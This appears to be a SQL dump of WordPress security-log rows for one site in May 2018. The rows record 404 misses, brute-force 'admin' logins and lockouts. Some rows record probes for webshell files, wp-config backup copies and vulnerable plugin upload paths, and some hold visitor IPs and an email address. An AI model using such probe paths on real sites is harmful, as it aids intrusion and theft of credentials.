(86756, 'four_oh_four', '404 Error', 3, '2018-05-01 09:56:18', '2018-05-01 14:56:18', '177.73.199.239', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86757, 'four_oh_four', '404 Error', 3, '2018-05-01 10:03:17', '2018-05-01 15:03:17', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86758, 'four_oh_four', '404 Error', 3, '2018-05-01 10:20:10', '2018-05-01 15:20:10', '109.203.109.210', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86759, 'four_oh_four', '404 Error', 3, '2018-05-01 10:20:11', '2018-05-01 15:20:11', '109.203.109.210', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86760, 'four_oh_four', '404 Error', 3, '2018-05-01 10:20:12', '2018-05-01 15:20:12', '109.203.109.210', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86761, 'four_oh_four', '404 Error', 3, '2018-05-01 10:20:16', '2018-05-01 15:20:16', '109.203.109.210', '', 0, '/wp-content/plugins/wp-symposium/server/php/hqWLzTPMfkSyUr.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86762, 'four_oh_four', '404 Error', 3, '2018-05-01 10:22:11', '2018-05-01 15:22:11', '203.77.230.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86763, 'four_oh_four', '404 Error', 3, '2018-05-01 10:22:12', '2018-05-01 15:22:12', '203.77.230.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86764, 'four_oh_four', '404 Error', 3, '2018-05-01 11:28:13', '2018-05-01 16:28:13', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86765, 'four_oh_four', '404 Error', 3, '2018-05-01 11:32:17', '2018-05-01 16:32:17', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86766, 'four_oh_four', '404 Error', 3, '2018-05-01 11:42:51', '2018-05-01 16:42:51', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86767, 'four_oh_four', '404 Error', 3, '2018-05-01 11:43:19', '2018-05-01 16:43:19', '88.177.11.219', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86768, 'four_oh_four', '404 Error', 3, '2018-05-01 12:21:56', '2018-05-01 17:21:56', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86769, 'four_oh_four', '404 Error', 3, '2018-05-01 12:58:20', '2018-05-01 17:58:20', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86770, 'four_oh_four', '404 Error', 3, '2018-05-01 13:12:41', '2018-05-01 18:12:41', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86771, 'four_oh_four', '404 Error', 3, '2018-05-01 13:12:42', '2018-05-01 18:12:42', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86772, 'four_oh_four', '404 Error', 3, '2018-05-01 13:12:44', '2018-05-01 18:12:44', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86773, 'four_oh_four', '404 Error', 3, '2018-05-01 13:12:45', '2018-05-01 18:12:45', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86774, 'four_oh_four', '404 Error', 3, '2018-05-01 13:13:36', '2018-05-01 18:13:36', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86775, 'four_oh_four', '404 Error', 3, '2018-05-01 13:18:29', '2018-05-01 18:18:29', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86776, 'four_oh_four', '404 Error', 3, '2018-05-01 13:26:07', '2018-05-01 18:26:07', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86777, 'four_oh_four', '404 Error', 3, '2018-05-01 13:26:08', '2018-05-01 18:26:08', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86778, 'four_oh_four', '404 Error', 3, '2018-05-01 13:26:11', '2018-05-01 18:26:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86779, 'four_oh_four', '404 Error', 3, '2018-05-01 13:26:12', '2018-05-01 18:26:12', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86780, 'four_oh_four', '404 Error', 3, '2018-05-01 13:42:16', '2018-05-01 18:42:16', '170.82.208.112', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(86781, 'four_oh_four', '404 Error', 3, '2018-05-01 13:44:31', '2018-05-01 18:44:31', '122.155.1.32', '', 0, '/wp-config.save', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86782, 'four_oh_four', '404 Error', 3, '2018-05-01 13:45:36', '2018-05-01 18:45:36', '122.155.1.32', '', 0, '/wp-config.orig', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86783, 'four_oh_four', '404 Error', 3, '2018-05-01 13:46:06', '2018-05-01 18:46:06', '122.155.1.32', '', 0, '/wp-config.original', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86784, 'four_oh_four', '404 Error', 3, '2018-05-01 13:55:47', '2018-05-01 18:55:47', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86785, 'four_oh_four', '404 Error', 3, '2018-05-01 13:56:50', '2018-05-01 18:56:50', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86786, 'four_oh_four', '404 Error', 3, '2018-05-01 14:11:30', '2018-05-01 19:11:30', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86787, 'four_oh_four', '404 Error', 3, '2018-05-01 14:33:11', '2018-05-01 19:33:11', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86788, 'four_oh_four', '404 Error', 3, '2018-05-01 14:33:23', '2018-05-01 19:33:23', '178.220.94.219', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86789, 'four_oh_four', '404 Error', 3, '2018-05-01 15:24:15', '2018-05-01 20:24:15', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86790, 'four_oh_four', '404 Error', 3, '2018-05-01 15:51:09', '2018-05-01 20:51:09', '41.101.200.2', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86791, 'four_oh_four', '404 Error', 3, '2018-05-01 15:51:45', '2018-05-01 20:51:45', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86792, 'four_oh_four', '404 Error', 3, '2018-05-01 16:08:16', '2018-05-01 21:08:16', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86793, 'four_oh_four', '404 Error', 3, '2018-05-01 16:09:08', '2018-05-01 21:09:08', '78.106.203.115', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86794, 'four_oh_four', '404 Error', 3, '2018-05-01 16:09:09', '2018-05-01 21:09:09', '78.106.203.115', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86795, 'four_oh_four', '404 Error', 3, '2018-05-01 16:09:13', '2018-05-01 21:09:13', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86796, 'four_oh_four', '404 Error', 3, '2018-05-01 16:15:13', '2018-05-01 21:15:13', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86797, 'four_oh_four', '404 Error', 3, '2018-05-01 16:23:32', '2018-05-01 21:23:32', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86955, 'four_oh_four', '404 Error', 3, '2018-05-02 15:49:00', '2018-05-02 20:49:00', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86956, 'four_oh_four', '404 Error', 3, '2018-05-02 15:50:13', '2018-05-02 20:50:13', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86954, 'four_oh_four', '404 Error', 3, '2018-05-02 15:42:48', '2018-05-02 20:42:48', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86953, 'four_oh_four', '404 Error', 3, '2018-05-02 15:28:49', '2018-05-02 20:28:49', '207.46.13.216', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86951, 'four_oh_four', '404 Error', 3, '2018-05-02 15:17:49', '2018-05-02 20:17:49', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86952, 'four_oh_four', '404 Error', 3, '2018-05-02 15:21:38', '2018-05-02 20:21:38', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86950, 'four_oh_four', '404 Error', 3, '2018-05-02 15:09:30', '2018-05-02 20:09:30', '157.55.39.81', '', 0, '/and-its-been-to-the-tech-center-after-they-won-talladega-in-the-spring-who-takes-very-good-care-of-me-or-into-anything-by-accident-anyway/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86949, 'four_oh_four', '404 Error', 3, '2018-05-02 15:08:08', '2018-05-02 20:08:08', '207.46.13.202', '', 0, '/www-baratorosherun-top/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86948, 'four_oh_four', '404 Error', 3, '2018-05-02 15:08:07', '2018-05-02 20:08:07', '207.46.13.215', '', 0, '/contacts', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86947, 'four_oh_four', '404 Error', 3, '2018-05-02 15:07:51', '2018-05-02 20:07:51', '207.46.13.215', '', 0, '/price', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86946, 'four_oh_four', '404 Error', 3, '2018-05-02 15:07:42', '2018-05-02 20:07:42', '207.46.13.215', '', 0, '/certified-practitioners/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86945, 'four_oh_four', '404 Error', 3, '2018-05-02 15:07:24', '2018-05-02 20:07:24', '157.55.39.81', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86944, 'four_oh_four', '404 Error', 3, '2018-05-02 15:07:21', '2018-05-02 20:07:21', '207.46.13.215', '', 0, '/certified-practitioners/4154626692/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86943, 'four_oh_four', '404 Error', 3, '2018-05-02 15:06:37', '2018-05-02 20:06:37', '157.55.39.81', '', 0, '/certified-practitioners/2/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86942, 'four_oh_four', '404 Error', 3, '2018-05-02 14:50:17', '2018-05-02 19:50:17', '110.37.227.140', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86941, 'four_oh_four', '404 Error', 3, '2018-05-02 14:50:16', '2018-05-02 19:50:16', '110.37.227.140', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86940, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:29', '2018-05-02 19:41:29', '77.121.238.19', '', 0, '/seomarket.php', 'http://clearyourbeliefs.org/seomarket.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86939, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:29', '2018-05-02 19:41:29', '77.121.238.19', '', 0, '/seomarket.php', 'http://clearyourbeliefs.com/seomarket.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86938, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:28', '2018-05-02 19:41:28', '77.121.238.19', '', 0, '/2708.php', 'http://clearyourbeliefs.org/2708.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86937, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:28', '2018-05-02 19:41:28', '77.121.238.19', '', 0, '/xmlrpz.php', 'http://clearyourbeliefs.com/xmlrpz.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86936, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/readme.php', 'http://clearyourbeliefs.org/readme.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86935, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/xmlrpz.php', 'http://clearyourbeliefs.org/xmlrpz.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86934, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/readme.php', 'http://clearyourbeliefs.com/readme.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86933, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/wp-mains.php', 'http://clearyourbeliefs.org/wp-mains.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86932, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/zharen.php', 'http://clearyourbeliefs.com/zharen.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86931, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/shell.php', 'http://clearyourbeliefs.org/shell.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86930, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/zharen.php', 'http://clearyourbeliefs.org/zharen.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86929, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:27', '2018-05-02 19:41:27', '77.121.238.19', '', 0, '/shell.php', 'http://clearyourbeliefs.com/shell.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86928, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:26', '2018-05-02 19:41:26', '77.121.238.19', '', 0, '/wp-mains.php', 'http://clearyourbeliefs.com/wp-mains.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86927, 'four_oh_four', '404 Error', 3, '2018-05-02 14:41:26', '2018-05-02 19:41:26', '77.121.238.19', '', 0, '/2708.php', 'http://clearyourbeliefs.com/2708.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(86926, 'four_oh_four', '404 Error', 3, '2018-05-02 14:22:32', '2018-05-02 19:22:32', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86925, 'four_oh_four', '404 Error', 3, '2018-05-02 13:54:41', '2018-05-02 18:54:41', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86924, 'four_oh_four', '404 Error', 3, '2018-05-02 13:06:24', '2018-05-02 18:06:24', '142.4.200.37', '', 0, '/who-we-are/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86923, 'four_oh_four', '404 Error', 3, '2018-05-02 13:03:47', '2018-05-02 18:03:47', '142.4.200.37', '', 0, '/who-we-are/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86922, 'four_oh_four', '404 Error', 3, '2018-05-02 13:00:26', '2018-05-02 18:00:26', '142.4.200.37', '', 0, '/who-we-are/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86921, 'four_oh_four', '404 Error', 3, '2018-05-02 12:56:06', '2018-05-02 17:56:06', '142.4.200.37', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86920, 'four_oh_four', '404 Error', 3, '2018-05-02 11:37:23', '2018-05-02 16:37:23', '110.77.210.49', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86919, 'four_oh_four', '404 Error', 3, '2018-05-02 11:37:21', '2018-05-02 16:37:21', '110.77.210.49', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86918, 'four_oh_four', '404 Error', 3, '2018-05-02 11:23:10', '2018-05-02 16:23:10', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86917, 'four_oh_four', '404 Error', 3, '2018-05-02 11:07:21', '2018-05-02 16:07:21', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86915, 'four_oh_four', '404 Error', 3, '2018-05-02 10:42:55', '2018-05-02 15:42:55', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86916, 'four_oh_four', '404 Error', 3, '2018-05-02 10:50:39', '2018-05-02 15:50:39', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86914, 'four_oh_four', '404 Error', 3, '2018-05-02 09:51:18', '2018-05-02 14:51:18', '77.88.5.31', '', 0, '/blog/page/75/gmblslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86913, 'four_oh_four', '404 Error', 3, '2018-05-02 09:34:57', '2018-05-02 14:34:57', '223.186.126.39', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86912, 'four_oh_four', '404 Error', 3, '2018-05-02 09:24:19', '2018-05-02 14:24:19', '41.142.23.193', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86911, 'four_oh_four', '404 Error', 3, '2018-05-02 09:23:32', '2018-05-02 14:23:32', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86910, 'four_oh_four', '404 Error', 3, '2018-05-02 09:13:40', '2018-05-02 14:13:40', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86908, 'four_oh_four', '404 Error', 3, '2018-05-02 08:55:14', '2018-05-02 13:55:14', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86909, 'four_oh_four', '404 Error', 3, '2018-05-02 09:02:45', '2018-05-02 14:02:45', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86907, 'four_oh_four', '404 Error', 3, '2018-05-02 08:50:47', '2018-05-02 13:50:47', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86906, 'four_oh_four', '404 Error', 3, '2018-05-02 08:26:02', '2018-05-02 13:26:02', '113.95.165.143', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86904, 'four_oh_four', '404 Error', 3, '2018-05-02 08:09:33', '2018-05-02 13:09:33', '100.43.85.173', '', 0, '/blog/page/75/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86905, 'four_oh_four', '404 Error', 3, '2018-05-02 08:26:01', '2018-05-02 13:26:01', '113.95.165.143', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86903, 'four_oh_four', '404 Error', 3, '2018-05-02 07:50:48', '2018-05-02 12:50:48', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86902, 'four_oh_four', '404 Error', 3, '2018-05-02 07:46:27', '2018-05-02 12:46:27', '45.63.76.26', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86901, 'four_oh_four', '404 Error', 3, '2018-05-02 07:46:23', '2018-05-02 12:46:23', '45.63.76.26', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86900, 'four_oh_four', '404 Error', 3, '2018-05-02 07:45:15', '2018-05-02 12:45:15', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86899, 'four_oh_four', '404 Error', 3, '2018-05-02 07:45:13', '2018-05-02 12:45:13', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86898, 'four_oh_four', '404 Error', 3, '2018-05-02 07:33:45', '2018-05-02 12:33:45', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86897, 'four_oh_four', '404 Error', 3, '2018-05-02 07:19:48', '2018-05-02 12:19:48', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86896, 'lockout', 'Host or User Lockout', 10, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 07:30:11";s:11:"expires_gmt";s:19:"2018-05-02 12:30:11";s:4:"type";s:11:"brute_force";}'),
(86894, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', 'admin', 0, '', '', 'a:0:{}'),
(86895, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', 'admin', 0, '', '', 'a:0:{}'),
(86893, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', 'admin', 0, '', '', 'a:0:{}'),
(86892, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', 'admin', 0, '', '', 'a:0:{}'),
(86891, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:15:11', '2018-05-02 12:15:11', '185.220.101.44', 'admin', 0, '', '', 'a:0:{}'),
(86890, 'lockout', 'Host or User Lockout', 10, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 07:23:04";s:11:"expires_gmt";s:19:"2018-05-02 12:23:04";s:4:"type";s:11:"brute_force";}'),
(86889, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', 'admin', 0, '', '', 'a:0:{}'),
(86888, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', 'admin', 0, '', '', 'a:0:{}'),
(86887, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', 'admin', 0, '', '', 'a:0:{}'),
(86886, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', 'admin', 0, '', '', 'a:0:{}'),
(86885, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 07:08:04', '2018-05-02 12:08:04', '77.247.181.163', 'admin', 0, '', '', 'a:0:{}'),
(86884, 'four_oh_four', '404 Error', 3, '2018-05-02 06:44:54', '2018-05-02 11:44:54', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86881, 'four_oh_four', '404 Error', 3, '2018-05-02 06:10:05', '2018-05-02 11:10:05', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86882, 'four_oh_four', '404 Error', 3, '2018-05-02 06:26:55', '2018-05-02 11:26:55', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86883, 'four_oh_four', '404 Error', 3, '2018-05-02 06:42:03', '2018-05-02 11:42:03', '65.49.2.176', '', 0, '/author/maria/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86880, 'lockout', 'Host or User Lockout', 10, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 06:24:41";s:11:"expires_gmt";s:19:"2018-05-02 11:24:41";s:4:"type";s:11:"brute_force";}'),
(86879, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', 'admin', 0, '', '', 'a:0:{}'),
(86878, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', 'admin', 0, '', '', 'a:0:{}'),
(86877, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', 'admin', 0, '', '', 'a:0:{}'),
(86876, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', 'admin', 0, '', '', 'a:0:{}'),
(86875, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:41', '2018-05-02 11:09:41', '185.220.101.1', 'admin', 0, '', '', 'a:0:{}'),
(86874, 'lockout', 'Host or User Lockout', 10, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 06:24:25";s:11:"expires_gmt";s:19:"2018-05-02 11:24:25";s:4:"type";s:11:"brute_force";}'),
(86873, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', 'admin', 0, '', '', 'a:0:{}'),
(86872, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', 'admin', 0, '', '', 'a:0:{}'),
(86871, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', 'admin', 0, '', '', 'a:0:{}'),
(86869, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', 'admin', 0, '', '', 'a:0:{}'),
(86870, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 06:09:25', '2018-05-02 11:09:25', '185.100.84.250', 'admin', 0, '', '', 'a:0:{}'),
(86868, 'four_oh_four', '404 Error', 3, '2018-05-02 06:09:09', '2018-05-02 11:09:09', '103.53.169.27', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86867, 'four_oh_four', '404 Error', 3, '2018-05-02 06:09:08', '2018-05-02 11:09:08', '103.53.169.27', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86866, 'four_oh_four', '404 Error', 3, '2018-05-02 05:42:42', '2018-05-02 10:42:42', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86865, 'four_oh_four', '404 Error', 3, '2018-05-02 05:37:56', '2018-05-02 10:37:56', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86864, 'four_oh_four', '404 Error', 3, '2018-05-02 05:36:42', '2018-05-02 10:36:42', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86863, 'four_oh_four', '404 Error', 3, '2018-05-02 05:36:41', '2018-05-02 10:36:41', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86862, 'four_oh_four', '404 Error', 3, '2018-05-02 05:36:39', '2018-05-02 10:36:39', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86861, 'four_oh_four', '404 Error', 3, '2018-05-02 05:36:35', '2018-05-02 10:36:35', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86860, 'four_oh_four', '404 Error', 3, '2018-05-02 04:56:32', '2018-05-02 09:56:32', '77.88.5.39', '', 0, '/blog/page/82/href', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86859, 'four_oh_four', '404 Error', 3, '2018-05-02 04:25:58', '2018-05-02 09:25:58', '180.76.15.12', '', 0, '/author/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
